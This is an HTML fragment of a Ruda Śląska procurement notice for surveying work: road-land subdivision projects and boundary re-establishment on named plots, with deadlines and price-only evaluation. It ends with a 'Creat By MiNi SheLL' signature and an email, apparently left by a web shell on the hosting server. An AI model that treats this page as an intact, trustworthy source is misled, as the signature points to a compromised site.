                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie projektu podziału nieruchomości przy ul. Szkolnej i Mokrej. Wykonanie projektu podziału nieruchomości w trybie art. 73 ust. 3a ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz.U. Nr 133 poz. 872 z późn. zm.), w celu wydzielenia gruntu zajętego pod drogi publiczne:
- działka nr 190 o pow. 986 m2, obręb Bielszowice, k.m. 3, KW GL1S/00000618/3                                 
Cel zamówienia: Przygotowanie wniosków o stwierdzenie nabycia własności nieruchomości przez Miasto Ruda Śląska    
Ilość egzemplarzy projektu podziału, która ma zostać sporządzona dla każdej nieruchomości (nieruchomość rozumiana jako jedna księga wieczysta): liczba współwłaścicieli nieruchomości + 5 egzemplarzy.
Projekt podziału należy sporządzić zgodnie z przebiegiem linii faktycznego zajęcia nieruchomości pod pas drogowy drogi publicznej w dniu 31 grudnia 1998 r., ustalonym przez Wykonawcę na podstawie materiałów Państwowego Zasobu Geodezyjnego i Kartograficznego oraz na podstawie informacji o przebiegu granicy pasa drogowego drogi publicznej w dniu 31 grudnia 1998 r. pochodzącej od zarządcy drogi, przedstawionej na mapie stanowiącej załącznik do zamówienia. W każdym przypadku, kiedy ustalenia Wykonawcy co do przebiegu linii faktycznego zajęcia nieruchomości pasem drogowym w dniu 31 grudnia 1998 r. będą rozbieżne z przebiegiem tej linii przedstawionym przez zarządcę drogi na załączonej do zamówienia mapie, Wykonawca, przed sporządzeniem mapy z projektem podziału, zobowiązany jest poinformować o tym fakcie Zamawiającego i uzyskać szczegółowe wytyczne na temat sposobu podziału nieruchomości.
Elementy budynków (świetliki, zsypy do okien piwnicznych, werandy, schody i inne) pozostają poza projektowaną do wydzielenia działką pasa drogowego. W przypadku stwierdzenia w terenie, że elementy budynków znajdują się na projektowanej do wydzielenia działce pasa drogowego, Wykonawca, przed sporządzeniem mapy z projektem podziału, zobowiązany jest poinformować o tym fakcie Zamawiającego i uzyskać szczegółowe wytyczne na temat sposobu wydzielenia przedmiotowych części budynków.
Dopuszcza się wykonanie projektu podziału zgodnie z § 8 rozporządzenia Rady Ministrów z dnia 7 grudnia 2004 r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (Dz.U. Nr 268 poz. 2663).

W ramach zamówienia należy w trybie art. 39 ustawy z dnia 17.05.1989 r. Prawo geodezyjne i kartograficzne (tekst jednolity Dz.U. z 2016 r. poz. 1629 z późn. zm.) wznowić znaki graniczne (w przypadku ich uszkodzenia, zniszczenia, przesunięcia) lub wyznaczyć punkty graniczne działek podlegających podziałowi, ujawnione uprzednio w ewidencji gruntów i budynków.

W ramach zamówienia może zaistnieć konieczność wykonania rozgraniczenia nieruchomości lub zmiany powierzchni działki podlegającej wydzieleniu, co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich wykonanie.

W ramach zamówienia należy sporządzić protokół z czynności przyjęcia granic nieruchomości podlegającej podziałowi oraz utrwalenia na gruncie nowych punktów granicznych. O terminie przeprowadzenia czynności j.w., Wykonawca ma obowiązek powiadomić, oprócz właścicieli nieruchomości, także przedstawicieli Zamawiającego, tj. Wydział Gospodarki Nieruchomościami                i Wydział Dróg i Mostów Urzędu Miasta Ruda Śląska (każdy z ww. Wydziałów odrębnym zawiadomieniem).

W ramach zamówienia należy dokonać pomiaru aktualizacyjnego na projektowanej do wydzielenia działce pasa drogowego (np. krawężniki, mała architektura w pasie drogowym).

Mapę z projektem podziału, wykaz zmian gruntowych i wykaz synchronizacyjny należy wykonać zgodnie z obowiązującymi przepisami prawa i z wytycznymi Biura Geodety Miasta Ruda Śląska.
Na mapie z projektem podziału należy zamieścić klauzulę o następującej treści: niniejsza mapa przedstawia stan zajęcia nieruchomości pod pas drogi publicznej na dzień 31 grudnia 1998 r..
Mapę z projektem podziału, wykaz zmian gruntowych i wykaz synchronizacyjny dla każdej nieruchomości należy wykonać w liczbie egzemplarzy będącej sumą liczby właścicieli nieruchomości podlegającej podziałowi (w przypadku małżeństw dla każdego małżonka z osobna) i 5 egzemplarzy dla Zamawiającego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 112<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy zrealizować w terminie do 112 dni od dnia zawarcia umowy. <br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Wznowienie granicy nieruchomości i sporządzenie projektu podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Oświęcimskiej i Chmielnej. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wznowienie granicy nieruchomości i wykonanie projektu podziału nieruchomości w trybie art. 73 ust. 3a ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz.U. Nr 133 poz. 872 zpóźn. zm.), w celu wydzielenia gruntu zajętego pod drogi publiczne:
- działka nr 2236/24 o pow. 584 m2, obręb Kochłowice, k.m. 3, KW GL1S/00004034/3                                 
Cel zamówienia: Przygotowanie wniosków o stwierdzenie nabycia własności nieruchomości przez Miasto Ruda Śląska.    
Ilość egzemplarzy projektu podziału, która ma zostać sporządzona dla każdej nieruchomości (nieruchomość rozumiana jako jedna księga wieczysta): liczba współwłaścicieli nieruchomości + 5 egzemplarzy.
Wznowienie granic:
Dla zadania 10 należy wznowić punkty graniczne nieruchomości z działkami o numerach 1778/13 i 870/24, obręb Kochłowice, k.m.3. w celu ustalenia czy na dzień 31.12.1998 r. działki te były zajęte pod pas drogowy drogi publicznej.          
Prace terenowe i obliczeniowe w zakresie wznowień ze wskazaniem granic nieruchomości oraz w zakresie rozgraniczeń  jeżeli zaistnieje taka konieczność. Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska. 
 Zamawiający informuje, iż w przypadku zaistnienia konieczności wykonania rozgraniczenia nieruchomości Wykonawca powinien przewidzieć powyższe w cenie ofertowej zamówienia usługi. Za sporządzenie rozgraniczeń nieruchomości Zamawiający nie będzie ponosił dodatkowych kosztów. 
Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Projekt podziału: 
Projekt podziału należy sporządzić zgodnie z przebiegiem linii faktycznego zajęcia nieruchomości pod pas drogowy drogi publicznej w dniu 31 grudnia 1998 r., ustalonym przez Wykonawcę na podstawie materiałów Państwowego Zasobu Geodezyjnego i Kartograficznego oraz na podstawie informacji o przebiegu granicy pasa drogowego drogi publicznej w dniu 31 grudnia 1998 r. pochodzącej od zarządcy drogi, przedstawionej na mapie stanowiącej załącznik do zamówienia. W każdym przypadku, kiedy ustalenia Wykonawcy co do przebiegu linii faktycznego zajęcia nieruchomości pasem drogowym w dniu 31 grudnia 1998 r. będą rozbieżne z przebiegiem tej linii przedstawionym przez zarządcę drogi na załączonej do zamówienia mapie, Wykonawca, przed sporządzeniem mapy z projektem podziału, zobowiązany jest poinformować o tym fakcie Zamawiającego i uzyskać szczegółowe wytyczne na temat sposobu podziału nieruchomości.
Elementy budynków (świetliki, zsypy do okien piwnicznych, werandy, schody i inne) pozostają poza projektowaną do wydzielenia działką pasa drogowego. W przypadku stwierdzenia w terenie, że elementy budynków znajdują się na projektowanej do wydzielenia działce pasa drogowego, Wykonawca, przed sporządzeniem mapy z projektem podziału, zobowiązany jest poinformować o tym fakcie Zamawiającego i uzyskać szczegółowe wytyczne na temat sposobu wydzielenia przedmiotowych części budynków.
Dopuszcza się wykonanie projektu podziału zgodnie z § 8 rozporządzenia Rady Ministrów z dnia 7 grudnia 2004 r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (Dz.U. Nr 268 poz. 2663).
W ramach zamówienia należy w trybie art. 39 ustawy z dnia 17.05.1989 r. Prawo geodezyjne i kartograficzne (tekst jednolity Dz.U. z 2016 r. poz. 1629 z późn. zm.) wznowić znaki graniczne  (w przypadku ich uszkodzenia, zniszczenia, przesunięcia) lub wyznaczyć punkty graniczne działek podlegających podziałowi, ujawnione uprzednio w ewidencji gruntów i budynków.
W ramach zamówienia może zaistnieć konieczność wykonania rozgraniczenia nieruchomości lub zmiany powierzchni działki podlegającej wydzieleniu, co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich wykonanie.
W ramach zamówienia należy sporządzić protokół z czynności przyjęcia granic nieruchomości podlegającej podziałowi oraz utrwalenia na gruncie nowych punktów granicznych. O terminie przeprowadzenia czynności j.w., Wykonawca ma obowiązek powiadomić, oprócz właścicieli nieruchomości, także przedstawicieli Zamawiającego, tj. Wydział Gospodarki Nieruchomościami i Wydział Dróg i Mostów Urzędu Miasta Ruda Śląska (każdy z ww. Wydziałów odrębnym zawiadomieniem).
W ramach zamówienia należy dokonać pomiaru aktualizacyjnego na projektowanej do wydzielenia działce pasa drogowego (np. krawężniki, mała architektura w pasie drogowym).
Mapę z projektem podziału, wykaz zmian gruntowych i wykaz synchronizacyjny należy wykonać zgodnie z obowiązującymi przepisami prawa i z wytycznymi Biura Geodety Miasta Ruda Śląska.
Na mapie z projektem podziału należy zamieścić klauzulę o następującej treści: niniejsza mapa przedstawia stan zajęcia nieruchomości pod pas drogi publicznej na dzień 31 grudnia 1998 r..
Mapę z projektem podziału, wykaz zmian gruntowych i wykaz synchronizacyjny dla każdej nieruchomości należy wykonać w liczbie egzemplarzy będącej sumą liczby właścicieli nieruchomości podlegającej podziałowi (w przypadku małżeństw dla każdego małżonka z osobna) i 5 egzemplarzy dla Zamawiającego.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 161<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy zrealizować w terminie do 161 dni od dnia zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>Wznowienie i wskazanie grani nieruchomości połozonej w Rudzie Śląskiej - Ruda przy ul. Wyleżoła <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wznowienie i wskazanie wszystkich punktów granicznych nieruchomości położonej przy ul. Wylezoła dz. 1011/259.            
Prace terenowe i obliczeniowe w zakresie wznowień ze wskazaniem granic nieruchomości oraz w zakresie rozgraniczeń  jeżeli zaistnieje taka konieczność. Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska. Zamawiający informuje, iż w przypadku zaistnienia konieczności wykonania rozgraniczenia nieruchomości Wykonawca powinien przewidzieć powyższe w cenie ofertowej zamówienia usługi. Za sporządzenie rozgraniczeń nieruchomości Zamawiający nie będzie ponosił dodatkowych kosztów. 
Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa).W przypadku zajęcia działek pasem drogowym  zmiana użytków dr na właściwy. 
W ramach zleconej roboty należy zaktualizować treść mapy w zakresie położenia obiektów budowlanych. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 91<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy wykonać w terminie do 91 dni od dnia zawarcia umowy.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com